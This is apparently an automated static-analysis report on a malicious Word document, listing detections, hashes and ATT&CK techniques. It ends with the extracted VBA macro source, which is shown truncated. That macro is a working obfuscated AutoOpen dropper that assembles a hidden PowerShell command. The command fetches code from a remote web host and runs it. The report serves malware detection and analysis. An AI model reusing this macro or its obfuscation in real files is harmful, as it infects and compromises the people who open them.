Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bba4915f332aa245…

MALICIOUS

Office (OLE)

268.5 KB Created: 2018-03-07 21:55:00 Authoring application: Microsoft Office Word First seen: 2019-12-10
MD5: 2b601c4d842bb3f43b9fe6c2143c6e0a SHA-1: 47948014b8847f27f329c79eea5bcfd4af45703b SHA-256: bba4915f332aa2453823fb1c50a715f9ffd9cb02bdbfdeb292226738f9119584
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call to execute a command, likely to download and run a second-stage payload. The obfuscated script attempts to construct a command string, but the full URL or executable path could not be fully reconstructed due to truncation.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6466406-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6466406-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6215 bytes
SHA-256: 08bdb37ec23c670408d2b410b19d589136fbde310ba2449ef7816fc5b96fb857
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "prodigy"
Sub AutoOpen()
    Dim DL_TC As String
    FL_PH = Array("c", " ", "w", "u", "e", "h", "b", "o", "-", "a", "d", "n", "p", "t", "y", "s", "r", "x", "i", "l")
    Dim EP_TH As String
    EP_TH = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
    DL_TC = DL_TC + FL_PH(12)
    DL_TC = DL_TC + FL_PH(7)
    Dim IS_NH As String
    IS_NH = "AHsAcgBlAHQAdQByAG4A"
    DL_TC = DL_TC + FL_PH(2)
    DL_TC = DL_TC + FL_PH(4)
    Dim JK_MD As String
    JK_MD = "IABbAFMAeQBzAHQA"
    DL_TC = DL_TC + FL_PH(16)
    DL_TC = DL_TC + FL_PH(15)
    Dim EQ_TI As String
    EQ_TI = "ZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpA"
    DL_TC = DL_TC + FL_PH(5)
    DL_TC = DL_TC + FL_PH(4)
    Dim IP_KF As String
    IP_KF = "G4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAa"
    IT_TJ = IT_TJ & EP_TH & IS_NH & JK_MD & EQ_TI & IP_KF
    DL_TC = DL_TC + FL_PH(19)
    DL_TC = DL_TC + FL_PH(19)
    Dim CQ_PH As String
    CQ_PH = "QBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIA"
    DL_TC = DL_TC + FL_PH(1)
    DL_TC = DL_TC + FL_PH(8)
    Dim FM_QD As String
    FM_QD = "dABdADoAOgB"
    DL_TC = DL_TC + FL_PH(2)
    DL_TC = DL_TC + FL_PH(18)
    Dim BS_NJ As String
    BS_NJ = "GAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAb"
    DL_TC = DL_TC + FL_PH(11)
    DL_TC = DL_TC + FL_PH(10)
    Dim FP_PA As String
    FP_PA = "gBnACgAJAB"
    DL_TC = DL_TC + FL_PH(7)
    DL_TC = DL_TC + FL_PH(2)
    Dim HS_KB As String
    HS_KB = "4ACkAKQB9ADsAaQBlAHgAIAAkACgAYQAgACQ"
    IT_TJ = IT_TJ & CQ_PH & FM_QD & BS_NJ & FP_PA & HS_KB
    DL_TC = DL_TC + FL_PH(15)
    DL_TC = DL_TC + FL_PH(13)
    Dim BQ_OI As String
    BQ_OI = "AKAAkACgAJAAoAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBl"
    DL_TC = DL_TC + FL_PH(14)
    DL_TC = DL_TC + FL_PH(19)
    Dim CN_LI As String
    CN_LI = "AHEAdQBlAHMAdAA"
    DL_TC = DL_TC + FL_PH(4)
    DL_TC = DL_TC + FL_PH(1)
    Dim AS_OJ As String
    AS_OJ = "gACcAaAB0AHQAcABzADoALwAvAHUAc"
    DL_TC = DL_TC + FL_PH(5)
    DL_TC = DL_TC + FL_PH(18)
    Dim BL_RF As String
    BL_RF = "wBwAHIAZA"
    DL_TC = DL_TC + FL_PH(10)
    DL_TC = DL_TC + FL_PH(10)
    Dim HK_PC As String
    HK_PC = "A1ADEANQAwAGMAZQBuAHQAcgB"
    IT_TJ = IT_TJ & BQ_OI & CN_LI & AS_OJ & BL_RF & HK_PC
    DL_TC = DL_TC + FL_PH(4)
    DL_TC = DL_TC + FL_PH(11)
    Dim JP_TI As String
    JP_TI = "hAGwALgB0AGEAYgBsAGUALgBj"
    DL_TC = DL_TC + FL_PH(1)
    DL_TC = DL_TC + FL_PH(8)
    Dim BR_KI As String
    BR_KI = "AG8AcgBlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8A"
    DL_TC = DL_TC + FL_PH(4)
    DL_TC = DL_TC + FL_PH(17)
    Dim GS_PI As String
    GS_PI = "dwBhAHIAZQBoAG8"
    DL_TC = DL_TC + FL_PH(4)
    DL_TC = DL_TC + FL_PH(0)
    Dim FO_QA As String
    FO_QA = "AdQBzAGUAPwAkAGYAaQBsAH"
    DL_TC = DL_TC + FL_PH(3)
    DL_TC = DL_TC + FL_PH(13)
    Dim IR_TA As String
    IR_TA = "QAZQByAD0AUABhAHIAdABpAHQAaQB"
    IT_TJ = IT_TJ & JP_TI & BR_KI & GS_PI & FO_QA & IR_TA
    DL_TC = DL_TC + FL_PH(18)
    DL_TC = DL_TC + FL_PH(7)
    Dim DT_MB As String
    DT_MB = "vAG4ASwBlAHkAJQAyADAAZQBxACUAMgAwA"
    DL_TC = DL_TC + FL_PH(11)
    DL_TC = DL_TC + FL_PH(12)
    Dim EK_PI As String
    EK_PI = "CUAMgA3AHMAdABhAGcAZQA"
    DL_TC = DL_TC + FL_PH(7)
    DL_TC = DL_TC + FL_PH(19)
    Dim AQ_OJ As String
    AQ_OJ = "lADIANwAm"
    DL_TC = DL_TC + FL_PH(18)
    DL_TC = DL_TC + FL_PH(0)
    Dim IO_NJ As String
    IO_NJ = "ACQAUwBlAGwAZQB"
    DL_TC = DL_TC + FL_PH(14)
    DL_TC = DL_TC + FL_PH(1)
    Dim FM_MB As String
    FM_MB = "jAHQAPQBkAGEAdABh"
    IT_TJ = IT_TJ & DT_MB & EK_PI & AQ_OJ & IO_NJ & FM_MB
    DL_TC = DL_TC + FL_PH(6)
    DL_TC = DL_TC + FL_PH(14)
    Dim DK_RJ As String
    DK_RJ = "ACYAcwB2AD0AMgAwADEANwAtADA"
    DL_TC = DL_TC + FL_PH(12)
    DL_TC = DL_TC + FL_
... (truncated)